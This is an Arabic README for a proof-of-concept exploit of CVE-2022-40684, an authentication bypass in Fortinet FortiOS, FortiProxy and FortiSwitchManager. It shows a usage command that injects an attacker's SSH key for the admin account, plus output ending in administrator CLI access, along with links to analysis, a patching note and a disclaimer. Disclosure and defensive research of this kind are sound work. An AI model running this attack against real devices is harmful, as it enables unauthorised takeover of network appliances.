
إثبات مفهوم لثغرة تجاوز المصادقة CVE-2022-40684 في Fortinet FortiOS وFortiProxy وFortiSwitchManager، مما يتيح حقن مفتاح SSH لمستخدمين محددين.
POC لـ CVE-2022-40684 يؤثر على أجهزة Fortinet FortiOS وFortiProxy وFortiSwitchManager.
يمكن العثور على تحليل فني للسبب الجذري للثغرة على مدونتنا: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
لتحليل سجلات Fortinet لمؤشرات الاختراق وكيفية تمكين السجلات الأعمق، تفضل بزيارة مدونة مؤشرات الاختراق لدينا: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
يستغل هذا الـ POC ثغرة تجاوز المصادقة لتعيين مفتاح SSH للمستخدم المحدد.
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
قم بالتحديث إلى أحدث إصدار أو خفف المخاطر باتباع التعليمات الواردة في Fortinet PSIRT
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا بإذن صريح. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.